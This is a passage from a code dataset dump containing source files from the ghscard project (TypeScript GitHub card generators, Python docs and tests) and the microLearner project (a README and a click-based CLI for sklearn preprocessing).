"0a2dc957a37cf26f54677f1a646320af9c29d2f0", "content_id": "2b62d072e511b2c060da0ce7fbacdf2c342eed1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1329, "license_type": "permissive", "max_line_length": 81, "num_lines": 59, "path": "/docs/make_readme.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport sys\n\nfrom readmemaker import ReadmeMaker\n\n\nPROJECT_NAME = \"ghscard\"\nOUTPUT_DIR = \"..\"\n\n\ndef write_quickstart(maker):\n maker.set_indent_level(0)\n maker.write_introduction_file(\"quickstart.txt\")\n\n maker.inc_indent_level()\n maker.write_chapter(\"For more information\")\n maker.write_lines(\n [\n \"More examples are available at \",\n f\"https://{PROJECT_NAME:s}.rtfd.io/en/latest/pages/usage/index.html\",\n ]\n )\n\n\ndef main():\n maker = ReadmeMaker(\n PROJECT_NAME,\n OUTPUT_DIR,\n is_make_toc=True,\n project_url=f\"https://github.com/thombashi/{PROJECT_NAME}\",\n )\n\n maker.write_chapter(\"Summary\")\n maker.write_introduction_file(\"summary.txt\")\n maker.write_introduction_file(\"badges.txt\")\n\n maker.write_chapter(\"Demo\")\n maker.write_introduction_file(\"demo.txt\")\n maker.write_introduction_file(\"installation.rst\")\n\n write_quickstart(maker)\n\n maker.write_file(maker.doc_page_root_dir_path.joinpath(\"environment.rst\"))\n\n maker.write_chapter(\"Documentation\")\n maker.write_lines([f\"https://{PROJECT_NAME:s}.rtfd.io/\"])\n\n maker.write_file(maker.doc_page_root_dir_path.joinpath(\"sponsors.rst\"))\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n" }, { "alpha_fraction": 0.598978579044342, "alphanum_fraction": 0.5994892716407776, "avg_line_length": 28.223880767822266, "blob_id": "2fb61c37949ac7b8e0e14d332f5b3e25b2b499ee", "content_id": "f5027cb8fdffe2557c37c0dd7e49882939480be2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 9790, "license_type": "permissive", "max_line_length": 100, "num_lines": 335, "path": "/src/card/base.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CARD_ELEMENT_ID, Margin, DEFAULT_SEMANTIC_UI_CSS_URL, JsUrl } from \"../const\";\nimport { EmojiProcessorInterface } from \"../emoji\";\nimport { DateTimeKey, UiColor, UiSize } from \"../types\";\nimport { CardGeratorInterface } from \"./interface\";\n\nimport dayjs from \"dayjs\";\n\nexport class AbstractCardGerator implements CardGeratorInterface {\n protected get headerSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get htmlUrl(): string {\n throw Error(\"not implemented\");\n }\n\n protected get infoSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get popupSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get color(): string {\n return this._color;\n }\n\n protected get iframeWidth(): number {\n return this._iframeWidth;\n }\n\n protected get cardWidth(): number {\n return this.iframeWidth - Margin.FRAME * 2;\n }\n\n constructor(\n protected _doc: Document,\n protected _cardData: object,\n private _iframeWidth: number,\n private _color: string,\n protected _emojiProcessor: EmojiProcessorInterface\n ) {}\n\n public createCard(uniqueFrameNumber: number): HTMLIFrameElement {\n const cardFrame = this._doc.createElement(\"iframe\");\n\n cardFrame.id = `__ghscard_iframe${uniqueFrameNumber}__`;\n cardFrame.scrolling = \"no\";\n cardFrame.width = `${this.iframeWidth}px`;\n cardFrame.style.visibility = \"hidden\";\n cardFrame.style.border = \"0px\";\n // cardFrame.style.overflow = \"visible\";\n // this.appendCardCss(cardFrame.id);\n\n const iframeBody = this._doc.createElement(\"body\");\n iframeBody.appendChild(this.createCardElement());\n iframeBody.appendChild(this.createScriptElement());\n\n const html = this.createHeaderElement().outerHTML + iframeBody.outerHTML;\n (<any>cardFrame).srcdoc = html;\n\n return cardFrame;\n }\n\n protected isDisplayChart(): boolean {\n return false;\n }\n\n protected isDisplayCommitChart(): boolean {\n return false;\n }\n\n private createCardElement(): HTMLElement {\n const card: HTMLElement = this.createElement(\"div\", `ui ${this.getColor()} card`);\n card.id = CARD_ELEMENT_ID;\n card.style.margin = `${Margin.CARD_CONTENT}px`;\n card.appendChild(this.createCardContent());\n\n const extraCardContent = this.createExtraCardContent();\n if (extraCardContent !== null) {\n card.appendChild(extraCardContent);\n }\n\n return card;\n }\n\n protected getColor(): UiColor {\n throw Error(\"not implemented\");\n }\n\n protected getScript(): string {\n throw Error(\"not implemented\");\n }\n\n protected createCardHeader(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n protected createCardContent(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n protected createExtraCardContent(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n private createHeaderElement(): HTMLElement {\n const header = this._doc.createElement(\"header\");\n header.appendChild(this.createScriptSrcElement(JsUrl.JQUERY));\n header.appendChild(\n this.createStyleSheetLinkElement(this._doc, DEFAULT_SEMANTIC_UI_CSS_URL)\n );\n header.appendChild(this.createScriptSrcElement(JsUrl.SEMANTIC_UI));\n\n if (this.isDisplayChart()) {\n header.appendChild(this.createScriptSrcElement(JsUrl.MOMENT));\n header.appendChild(this.createScriptSrcElement(JsUrl.CHART));\n header.appendChild(this.createScriptSrcElement(JsUrl.PLEASE));\n }\n\n header.appendChild(\n this.createCssElement(this._doc, `.ui.card { width: ${this.cardWidth}px; }`)\n );\n\n return header;\n }\n\n private createCssElement(doc: Document, cssText: string) {\n const css = doc.createElement(\"style\");\n css.type = \"text/css\";\n css.appendChild(doc.createTextNode(cssText));\n\n return css;\n }\n\n private createStyleSheetLinkElement(doc: Document, href: string) {\n const link = doc.createElement(\"link\");\n link.rel = \"stylesheet\";\n link.href = href;\n\n return link;\n }\n\n protected createElement(tagName: string, className: string): HTMLElement {\n const element: HTMLElement = this._doc.createElement(tagName);\n element.className = className;\n\n return element;\n }\n\n protected createAnchorElement(href: string, className: string = null): HTMLAnchorElement {\n const element: HTMLAnchorElement = this._doc.createElement(\"a\");\n if (className) {\n element.className = className;\n }\n element.href = href;\n element.target = \"__top\";\n\n return element;\n }\n\n protected createImageElement(src: string, className: string = null): HTMLImageElement {\n const element: HTMLImageElement = this._doc.createElement(\"img\");\n if (className) {\n element.className = className;\n }\n element.src = src;\n\n return element;\n }\n\n protected createLabelElement(text: string, size: UiSize): HTMLElement {\n const label = this.createElement(\"div\", `ui circular horizontal ${size} label`);\n\n label.style.marginLeft = `${Margin.LABEL}px`;\n label.appendChild(this._doc.createTextNode(text));\n\n return label;\n }\n\n protected createElementWithChild<T>(className: string, childNodeArray: Array<T>): HTMLElement {\n const element = this.createElement(\"div\", className);\n\n Array.prototype.forEach.call(childNodeArray, (childNode) => {\n if (childNode) {\n element.appendChild(childNode);\n }\n });\n\n return element;\n }\n\n protected createContentElement<T>(childNodeArray: Array<T>): HTMLElement {\n const content = this.createElement(\"div\", \"content\");\n\n Array.prototype.forEach.call(childNodeArray, (childNode) => {\n if (childNode) {\n content.appendChild(childNode);\n }\n });\n\n return content;\n }\n\n protected createColumn(element: HTMLElement, wide = \"\"): HTMLElement {\n const column = this.createElement(\"div\", `${wide} column`);\n column.appendChild(element);\n\n return column;\n }\n\n protected createDescription(text: string): HTMLElement {\n if (!text) {\n return null;\n }\n\n const descElement = this.createElement(\"div\", \"description\");\n descElement.innerHTML = this._emojiProcessor.processEmoji(this.escapeHtml(text));\n\n return descElement;\n }\n\n protected createDateTimeElement(\n key: DateTimeKey,\n prefix: string,\n iconName: string,\n className: string\n ): HTMLElement {\n const datetimeValue = this._cardData[key];\n if (!datetimeValue) {\n return null;\n }\n\n const datetimeElement: HTMLElement = this.createElement(\"div\", className);\n datetimeElement.appendChild(this.createElement(\"i\", iconName));\n datetimeElement.appendChild(\n this.createContentElement([\n this._doc.createTextNode(`${prefix} ${dayjs(datetimeValue).format(\"YYYY-MM-DD\")}`),\n ])\n );\n\n return datetimeElement;\n }\n\n protected createPopup(): HTMLElement {\n const popup = this.createElement(\"div\", \"ui special popup\");\n popup.appendChild(this.createPopupInfoList());\n\n return popup;\n }\n\n protected createPopupInfoList(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n private createScriptElement(): HTMLElement {\n const scriptContent = [\"$(window).on(\\\"load\\\", function() {\", this.getScript(), \"});\"].join(\n \"\\n\"\n );\n\n const scriptElement = this._doc.createElement(\"script\");\n scriptElement.innerHTML = scriptContent;\n\n return scriptElement;\n }\n\n private createScriptSrcElement(src: string, charset = null) {\n const script = this._doc.createElement(\"script\");\n script.src = src;\n\n if (charset) {\n script.charset = charset;\n }\n\n return script;\n }\n\n protected _createEmailElement(emailAddress: string, className: string): HTMLElement {\n if (!emailAddress) {\n return null;\n }\n\n const mailLink = this.createAnchorElement(`mailto:${emailAddress}`, \"content\");\n mailLink.appendChild(this._doc.createTextNode(this.escapeHtml(emailAddress)));\n\n const email = this.createElement(\"div\", className);\n email.title = \"email address\";\n email.appendChild(this.createElement(\"i\", \"mail icon\"));\n email.appendChild(mailLink);\n\n return email;\n }\n\n protected escapeHtml(text: string): string {\n return text\n .replace(/&/g, \"&amp;\")\n .replace(/</g, \"&lt;\")\n .replace(/>/g, \"&gt;\")\n .replace(/\"/g, \"&quot;\")\n .replace(/'/g, \"&#39;\");\n }\n\n protected toUiColor(color: string): UiColor {\n const validColorArray = [\n \"red\",\n \"orange\",\n \"yellow\",\n \"olive\",\n \"green\",\n \"teal\",\n \"blue\",\n \"violet\",\n \"purple\",\n \"pink\",\n \"brown\",\n \"grey\",\n \"black\",\n ];\n const defaultColor = \"grey\";\n\n if (color == null) {\n return defaultColor;\n }\n\n color = color.toLowerCase();\n if (validColorArray.indexOf(color) >= 0) {\n return validColorArray[color];\n }\n\n console.warn(`unexpected color: (${color})`);\n\n return defaultColor;\n }\n}\n" }, { "alpha_fraction": 0.583178699016571, "alphanum_fraction": 0.583178699016571, "avg_line_length": 22.434782028198242, "blob_id": "5acfcedbb6d0c5daaa18867e3457d5a6d861a21c", "content_id": "8531a6f90c2e38c5b2f3cca90d5a808b0299bd44", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1617, "license_type": "permissive", "max_line_length": 72, "num_lines": 69, "path": "/src/card/repository/tiny.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { ChartSize } from \"../../const\";\nimport { UiSize } from \"../../types\";\nimport { AbstractRepositoryCardGerator } from \"./base_repository\";\n\nexport class TinyRepoCardGerator extends AbstractRepositoryCardGerator {\n protected get headerSize(): UiSize {\n return \"small\";\n }\n\n protected get infoSize(): UiSize {\n return \"tiny\";\n }\n\n protected get popupSize(): UiSize {\n return \"mini\";\n }\n\n protected get versionLabelSize(): UiSize {\n return \"tiny\";\n }\n\n protected get topicSize(): UiSize {\n return \"mini\";\n }\n\n protected get lineChartHeight(): number {\n return ChartSize.Line.Tiny.HEIGHT;\n }\n\n protected get pieChartHeight(): number {\n return ChartSize.Pie.Tiny.HEIGHT;\n }\n\n protected get pieChartLegendFontSize(): number {\n return ChartSize.Pie.Tiny.LEGEND_FONT_SIZE;\n }\n\n protected get chartTitleFontSize(): number {\n return ChartSize.Line.Tiny.TITLE_FONT_SIZE;\n }\n\n protected get chartTickFontSize(): number {\n return ChartSize.Line.Tiny.TICK_FONT_SIZE;\n }\n\n protected isDisplayChart(): boolean {\n if (this.chartDisplay === \"block\") {\n return true;\n }\n\n return false;\n }\n\n protected createCardInfoList(): HTMLElement {\n return null;\n }\n\n protected createPopupInfoList(): HTMLElement {\n return this._createInfoList(\n {\n repo_homepage: true,\n wiki: true,\n license: true,\n created_at: true,\n },\n this.popupSize\n );\n }\n}\n" }, { "alpha_fraction": 0.4034496545791626, "alphanum_fraction": 0.4034496545791626, "avg_line_length": 32.85234832763672, "blob_id": "dc249eff77e98d4bb8166881bf4eb4536183f777", "content_id": "2dbc41e9b7ff6153dec8a436c0cf59055ab042cd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 5044, "license_type": "permissive", "max_line_length": 94, "num_lines": 149, "path": "/src/factory.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CardGeratorInterface } from \"./card/interface\";\nimport { MediumOrgCardGerator } from \"./card/organization/medium\";\nimport { SmallOrgCardGerator } from \"./card/organization/small\";\nimport { TinyOrgCardGerator } from \"./card/organization/tiny\";\nimport { MediumRepoCardGerator } from \"./card/repository/medium\";\nimport { SmallRepoCardGerator } from \"./card/repository/small\";\nimport { TinyRepoCardGerator } from \"./card/repository/tiny\";\nimport { MediumUserCardGerator } from \"./card/user/medium\";\nimport { SmallUserCardGerator } from \"./card/user/small\";\nimport { TinyUserCardGerator } from \"./card/user/tiny\";\nimport { EmojiProcessorInterface } from \"./emoji\";\nimport { CardStyle, CardType, ElementDisplay } from \"./types\";\n\nexport function createCardGenerator(\n doc: Document,\n cardStyle: CardStyle,\n cardData: object,\n iframeWidth: number,\n color: string,\n chartDisplay: ElementDisplay,\n topicDisplay: ElementDisplay,\n emojiProcessor: EmojiProcessorInterface\n): CardGeratorInterface {\n const cardType: CardType = cardData[\"card_type\"].toLowerCase();\n\n console.debug([\n \"createCardGenerator:\",\n ` chartDisplay: ${chartDisplay}`,\n ` topicDisplay: ${topicDisplay}`,\n ]);\n\n switch (cardType) {\n case \"organization\": {\n switch (cardStyle) {\n case \"medium\": {\n return new MediumOrgCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"small\": {\n return new SmallOrgCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"tiny\": {\n return new TinyOrgCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n default: {\n console.error(`invalid card style: type=${cardType}, style=${cardStyle}`);\n return null;\n }\n }\n }\n case \"repository\": {\n switch (cardStyle) {\n case \"medium\": {\n return new MediumRepoCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n chartDisplay,\n topicDisplay,\n emojiProcessor\n );\n }\n case \"small\": {\n return new SmallRepoCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n chartDisplay,\n topicDisplay,\n emojiProcessor\n );\n }\n case \"tiny\": {\n return new TinyRepoCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n chartDisplay,\n topicDisplay,\n emojiProcessor\n );\n }\n default: {\n console.error(`invalid card style: type=${cardType}, style=${cardStyle}`);\n return null;\n }\n }\n }\n case \"user\": {\n switch (cardStyle) {\n case \"medium\": {\n return new MediumUserCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"small\": {\n return new SmallUserCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"tiny\": {\n return new TinyUserCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n default: {\n console.error(`invalid card style: type=${cardType}, style=${cardStyle}`);\n return null;\n }\n }\n }\n default: {\n console.error(`invalid card type: ${cardType}`);\n return null;\n }\n }\n}\n" }, { "alpha_fraction": 0.46306896209716797, "alphanum_fraction": 0.46852004528045654, "avg_line_length": 32.66054916381836, "blob_id": "b676dc9ef1a49da9499e32b7a9d6414ab276e5b1", "content_id": "8864dcced3fdeb7ed182b00133b177dfeaffdd04", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3669, "license_type": "permissive", "max_line_length": 123, "num_lines": 109, "path": "/docs/pages/usage/usage.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Usage\n=============\n\nCreate User/Organization Cards\n------------------------------------\n1. Generate a card data file\n Execute ``ghscard gen <user-name or organization-name>``.\n\n .. code::\n\n $ ghscard gen thombashi -o data\n [INFO] ghscard gen: written user data to 'data/thombashi.json'\n\n2. Add HTML tags to a HTML file\n .. code-block:: html\n\n <div class='ghscard' src='data/thombashi.json'></div>\n\n <script src=\"//cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js\"></script>\n\n3. Result\n .. raw:: html\n\n <iframe src=\"//thombashi.github.io/ghscard/examples/user.html\" width=\"440\" height=\"510\" style=\"border: 0px;\">\n </iframe>\n \n\nCreate Repository Cards\n--------------------------------------\n1. Generate a card data file\n Execute ``ghscard gen <user name>/<repository name>``.\n\n .. code::\n\n $ ghscard gen Microsoft/TypeScript -o data\n [INFO] ghscard gen: written repository data to 'data/Microsoft_TypeScript.json'\n\n2. Add HTML tags to a HTML file\n .. code-block:: html\n \n <div class=\"ghscard\" src=\"data/Microsoft_TypeScript.json\"></div>\n\n <script src=\"//cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js\"></script>\n\n3. Result\n .. raw:: html\n \n <iframe src=\"//thombashi.github.io/ghscard/examples/repository.html\" width=\"460\" height=\"670\" style=\"border: 0px;\">\n </iframe>\n\n\nCard Configurations\n--------------------------------------\n\n``card-style`` Attribute\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nCard size and display format change according to ``card-style`` attribute.\n``card-style`` attribute takes one of the following values:\n\n- ``medium`` `(default)`\n- ``small``\n- ``tiny``\n\n`Examples <//thombashi.github.io/ghscard/examples/card-style.html>`__\n\n\n``chart-display`` Attribute\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nCharts on repository cards can be changed visible or hidden by ``chart-display`` attribute value.\n\n.. table:: ``chart-display`` attribute\n\n ======================= ================================================\n Value Meaning\n ======================= ================================================\n ``block`` Display charts on cards.\n ``none`` NOT display charts on cards.\n ======================= ================================================\n\nDefault value differed by ``card-style`` attribute:\n\n.. table:: Default value of ``chart-display``\n\n ======================= ================================================\n ``card-style`` value Default value\n ======================= ================================================\n ``medium`` ``block``\n ``small`` ``block``\n ``tiny`` ``none``\n ======================= ================================================\n\n`Examples <//thombashi.github.io/ghscard/examples/chart-display.html>`__\n\n\n``topic-display`` Attribute\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nTopic labels repository cards can be changed visible or hidden by ``topic-display`` attribute value.\nDefaults to ``block``.\n\n.. table:: ``topic-display`` attribute\n\n ======================= ================================================\n Value Meaning\n ======================= ================================================\n ``block`` Display topic labels on cards.\n ``none`` NOT display topic labels on cards.\n ======================= ================================================\n\n`Examples <//thombashi.github.io/ghscard/examples/topic-display.html>`__\n" }, { "alpha_fraction": 0.6360874772071838, "alphanum_fraction": 0.6360874772071838, "avg_line_length": 30.961164474487305, "blob_id": "be14a1f0a8bb2a49cabdf4435c5ce1f1f0a1c58b", "content_id": "767f13117b6c86a000595ce72400ea90f29e15f0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3292, "license_type": "permissive", "max_line_length": 97, "num_lines": 103, "path": "/test/test_detector.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport github\nimport logbook\nimport pytest\nfrom github.GithubException import UnknownObjectException\n\nfrom ghscard._const import CardType\nfrom ghscard._detector import GithubIdDetector\n\n\ndef monkey_get_organization(a, b):\n raise UnknownObjectException(\"dummy_status\", \"dummy_data\", None)\n\n\nlogger = logbook.Logger(\"test\")\n\n\nclass Test_GithubIdDetector_constructor:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [None, ValueError],\n [\"\", ValueError],\n [\"/\", ValueError],\n [\"//\", ValueError],\n [\"a/b/c\", ValueError],\n ],\n )\n def test_exception(self, value, expected):\n with pytest.raises(expected):\n GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n\nclass Test_GithubIdDetector_id:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [\"thombashi\", \"thombashi\"],\n [\"thombashi/\", \"thombashi\"],\n [\"/thombashi\", \"thombashi\"],\n [\"/thombashi/\", \"thombashi\"],\n [\"thombashi/ghscard\", \"thombashi/ghscard\"],\n [\" thombashi / ghscard \", \"thombashi/ghscard\"],\n ],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", monkey_get_organization)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.id == expected\n\n\nclass Test_GithubIdDetector_is_user:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [[\"thombashi\", True], [\"thombashi/\", True], [\"/thombashi\", True], [\"/thombashi/\", True]],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", monkey_get_organization)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.is_user() == expected\n\n\nclass Test_GithubIdDetector_is_organization:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [[\"thombashi\", True], [\"thombashi/\", True], [\"/thombashi\", True], [\"/thombashi/\", True]],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", lambda a, b: a)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.is_organization() == expected\n\n\nclass Test_GithubIdDetector_is_repository:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"], [[\"thombashi/ghscard\", True], [\" thombashi / ghscard \", True]]\n )\n def test_normal(self, value, expected):\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.is_repository() == expected\n\n\nclass Test_GithubIdDetector_get_id_type:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [[\"thombashi\", CardType.USER], [\"thombashi/ghscard\", CardType.REPOSITORY]],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", monkey_get_organization)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.get_id_type() == expected\n" }, { "alpha_fraction": 0.5960837602615356, "alphanum_fraction": 0.5969945192337036, "avg_line_length": 35, "blob_id": "6bf8575a4813d3b4431e2358f3e07af8e1691d58", "content_id": "15dc2540011f2611ec2bbfc9d3c73b3b28a1ece1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2196, "license_type": "permissive", "max_line_length": 96, "num_lines": 61, "path": "/src/card/organization/base_organization.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AbstractUserOrgCardGerator } from \"../base_user_org\";\n\nexport class AbstractOrgCardGerator extends AbstractUserOrgCardGerator {\n protected get statsColumnWide(): string {\n return \"eight\";\n }\n\n protected createCardHeader(): HTMLElement {\n const header = this.createAnchorElement(\n this.htmlUrl,\n `ui ${this.headerSize} dividing header`\n );\n\n if (this.getCardData(\"name\")) {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"name\")));\n\n const subheader: HTMLElement = this.createElement(\"div\", \"sub header\");\n subheader.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n\n header.appendChild(subheader);\n } else {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n }\n\n return header;\n }\n\n protected createStatisticsElement(): HTMLElement {\n const items = this.createElement(\"div\", `ui ${this.infoSize} aligned selection list`);\n\n if (Number(this.publicRepos) > 0) {\n const item = this.createAnchorElement(`${this.htmlUrl}?tab=repositories`, \"item\");\n /*\n item.appendChild(this.createElement(\"i\", \"book icon\"));\n item.appendChild(this.createContentElement([\n this._doc.createTextNode(\"Repositories\"),\n this.createLabelElement(this.publicRepos, this.infoSize),\n ]));\n */\n item.appendChild(this._doc.createTextNode(\"Repositories\"));\n item.appendChild(this.createLabelElement(this.publicRepos, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.getCardData(\"public_members_count\")) > 0) {\n const item = this.createAnchorElement(\n `//github.com/orgs/${this.getCardData(\"id\")}/people`,\n \"item\"\n );\n item.appendChild(this._doc.createTextNode(\"People\"));\n item.appendChild(\n this.createLabelElement(this.getCardData(\"public_members_count\"), this.infoSize)\n );\n\n items.appendChild(item);\n }\n\n return items;\n }\n}\n" } ]
55
mortonjt/microLearner
https://github.com/mortonjt/microLearner
3949a4310ae2012b47a3bd5f8b906c36a3c43b8d
6ee58a0ddb4b99394290b9f768163d5330f52ad3
62f0f71fca1310c77e1fc330298ff1f7954d35cf
refs/heads/master
2020-12-25T21:44:41.616159
2014-07-14T20:17:25
2014-07-14T20:38:50
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6993613243103027, "alphanum_fraction": 0.7066605687141418, "avg_line_length": 27.467533111572266, "blob_id": "d834d9d74c37a2524c1f2adab8a28b0ade1252e9", "content_id": "045d3d5316225991019546698cf8fcde57c65c48", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2192, "license_type": "permissive", "max_line_length": 164, "num_lines": 77, "path": "/README.md", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "Machine Learning Package for Microbiome\n=======================================\n[![Build Status](https://travis-ci.org/RNAer/microLearner.svg?branch=master)](https://travis-ci.org/RNAer/microLearner)\n\n\nDependencies\n------------\n1. scikit-learn\n2. click\n3. pandas\n\nRunning the Commands\n-------------------\n\n### Bash completion\nEmpowered by `click`, `microLearner` supports bash auto-completion for command,\nsubcommands, arguments and options. Users just need to run:\n```\nsource bash_completion.sh\n```\nOr to make it permenant, add the above line to your `~/.bashrc` file.\n\nThe `bash_completion.sh` file comes with the package. But you can also create or\nupdate it with the following command:\n```\n_MICROLEARNER_COMPLETE=source microLearner > bash_completion.sh\n```\n\n### Other tips\n1. `microLearner` supports shorthands for subcommands as long as the shorthand is\n unambiguous. For example, `microLearner prep --help` and `microLearner preprocess --help`\n are exactly the same.\n \n2. `microLearner` is insensitive to the letter cases. For example, `microLearner prep --help`\n and `MicroLearner Prep --HELP`\n are exactly the same.\n\n\nPreprocess\n----------\n``preprocess`` is the subcommand of ``microLearner``. ``MinMaxScaler`` is the argument\nto the subcommand. ``--range``, ``-o`` and ``-i`` are the options. The options for the command is insensitive to the letter cases.\n\n```\nmicroLearner preprocess MinMaxScaler --range 0 1 -i microLearner/data/otus.txt -o /tmp/foo.txt\n```\n\n```\nmicroLearner preprocess MinMaxScaler --Range 0 1 -i microLearner/data/otus.txt -o /tmp/foo.txt\n```\n\nClassification\n--------------\n```\nmicroLearner classify DecisionTreeClassifier --criterion entropy --max_features None --max_depth None --min_samples_split 2 --min_samples_leaf 1 --random_state None\n```\n```\nmicroLearner classify DecisionTreeClassifier --criterion entropy --max_features None --max_depth None --min_samples_split 2 --min_samples_leaf 1 --random_state None\n```\n\n```\nmicroLearner classify RandomForestClassifier --n_estimators 500\n```\n```\nmicroLearner classify RandomForestClassifier \n```\nRegression\n----------\n```\nmicroLearner regress\n```\n\nClustering\n----------\n```\nmicroLearner cluster\n```\n" }, { "alpha_fraction": 0.5841053128242493, "alphanum_fraction": 0.5875182747840881, "avg_line_length": 33.18333435058594, "blob_id": "2e8864f19e9a4ad01bce1752f6874445ee6b5a31", "content_id": "b80f878a4cb85ff144aee635dedcbd3dba7208e9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2051, "license_type": "permissive", "max_line_length": 78, "num_lines": 60, "path": "/microLearner/cmd.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n\nfrom __future__ import print_function\nfrom microLearner.util.misc import AliasedGroup\nfrom sklearn import preprocessing\nimport click\nimport pandas as pd\nimport numpy as np\n\n\nCONTEXT_SETTINGS = dict(token_normalize_func=lambda x: x.lower())\n\n\[email protected](cls=AliasedGroup, context_settings=CONTEXT_SETTINGS)\[email protected]('-v', '--verbose', count=True)\[email protected]_option() # add --version option\[email protected]_context\ndef microLearner(ctx, verbose):\n pass\n\n\[email protected]()\[email protected]('method', nargs=1, default='StandardScaler',\n required=True,\n # specify legal choices for the methods; anything not\n # listed here will be not allowed.\n type=click.Choice(['StandardScaler',\n 'MinMaxScaler']))\[email protected]('-i', '--input_table', type=click.File('r'),\n # required=True,\n help='Input feature table.')\[email protected]('-o', '--output_table', type=click.File('w'),\n # required=True,\n help='Output feature table.')\[email protected]('--feature_range', nargs=2, type=float)\[email protected]_context\ndef preprocess(ctx, method, input_table, output_table, **kwargs):\n if ctx.parent.params['verbose'] > 0:\n click.echo(\"Running...\")\n click.echo(kwargs)\n if True:\n scaler = getattr(preprocessing, method)(**kwargs)\n i = pd.read_table(input_table)\n print(i)\n o = pd.DataFrame(scaler.fit_transform(np.array(i)), columns=i.columns)\n print(o)\n o.to_csv(output_table, sep='\\t')\n # output_table.write(out)\n else:\n print(ctx.parent.params)\n pass\n" }, { "alpha_fraction": 0.5846154093742371, "alphanum_fraction": 0.5923076868057251, "avg_line_length": 31.5, "blob_id": "a93092ba001446c1f00cdbb007b9d75bdc268c3b", "content_id": "d11751e43570a69be88de0d8d7999ded285296bb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 260, "license_type": "permissive", "max_line_length": 61, "num_lines": 8, "path": "/bash_completion.sh", "repo_name": "mortonjt/microLearner", 